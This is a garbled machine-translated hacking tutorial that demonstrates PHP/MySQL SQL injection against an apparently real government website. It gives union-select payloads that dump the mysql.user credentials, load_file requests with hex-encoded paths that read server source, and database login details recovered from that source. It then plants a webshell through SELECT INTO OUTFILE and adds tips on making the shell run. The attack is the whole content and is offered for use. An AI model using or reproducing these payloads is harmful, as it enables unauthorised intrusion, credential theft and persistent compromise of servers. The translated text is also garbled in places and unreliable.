Php injection to write files

One tutorial instance.
Http: // www. *** .gov.cn/gzdt_read.php? Id = 85 quotation marks

The following words are displayed:

Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in D: \ *** \ gzdt_read.php on line 29

Look, what is this? Physical path of the file on the server
Let's take a look at the usage of php + MySql injection in a slightly advanced manner, that is, load_file
Load_file: load the file! We can use load_file to view the MySql configuration information of the website.
The next step is to check the display bit. The displayed bit is at the title on the 8 th and 2 th.
The background is obviously the same as the previous one. It is estimated that the upload directory must have the execution permission. In this case, find the account and password of the MySql database.
There are two methods
1. Database explosion or 2. File explosion
Database explosion is simple, MySql Database user Field
Http: // www. *** .gov.cn/gzdt_read.php? Id = 85 + and + 1 = 2 + union + select + 1, concat (user, 0x5f, password), 3, 4, 5, 6, 7, 8 + from + mysql. user

409800db_7819157c663cb79f
The user name is 409800db. After the password is encrypted, the version of 7819157c663cb79 is 4.
Obviously, MySql cannot be encrypted.

The second method is used to view the configuration file through load_file.
The physical path of the website file is as follows:
D: \ *** \ gzdt_read.php
Then the hex value is taken, that is, its 16-bit encoding:

0x443a5c6864676c5c677a64745fda-561642e706870

The usage of load_file in injection is as follows:
+ Union + select + 1, 2, 3, hex (load_file (path hex Value), 5, 6, 7..., 8
The usage is not unique. This is one of
Of course, you are willing to add a from + admin next to this injection statement. I chose the 4-digit display space.
The final load_file injection statement is:
Http: // www. *** .gov.cn/gzdt_read.php? Id = 85 + and + 1 = 2 + union + select + 1, concat (user, 0x5f, password), 3, hex (load_file (0x443a5c6864676c5c677a64745f417561642e706870, 7, 8 + from + mysql. user
Now let's look at the source code:

These are the original code of the gzdt_read.php file after the hex value.
After copying, open WinHex and copy and paste it in. Format: ASCII HEX

Obtain the database connection information:
$ Host = "localhost ";
$ User = "jacky ";
$ Pass = "Harmony ";

The highlights are as follows:
Function to_html ($ str ){
$ Str = str_replace (chr (13), "<br>", str_replace (chr (32), "& nbsp;", htmlspecialchars ($ str )));
Return $ str;
}
This is the legendary lax filtering.
Ps: the users in the previous database are different from this. It indicates that the database has multiple management accounts!

Use tools to connect to MySql, create tables, and write webshell code:

Create table test (a text );

Then run the MySql statement:

Select a from mysql. test into outfile 'd: \ *** \ atesttest. php ';
Output to the path just now. Look, our horse appears.

Ps: Check the source code of the webshell. Each blank line has an \ n pair?
So an error occurs.

Warning: Unexpected character in input: '\' (ASCII = 92) state = 1

This is because when MySql outputs a file, the carriage return that we use on weekdays will automatically be on top \ n, the carriage return that we use most. therefore, generally, webshells are written in one sentence and seldom written in daemon, because daemon is often difficult to use because it has an additional \ n. The solution is to add one at the end of each line/* Add one at the beginning of each line */comment out this \ n and then write the horse.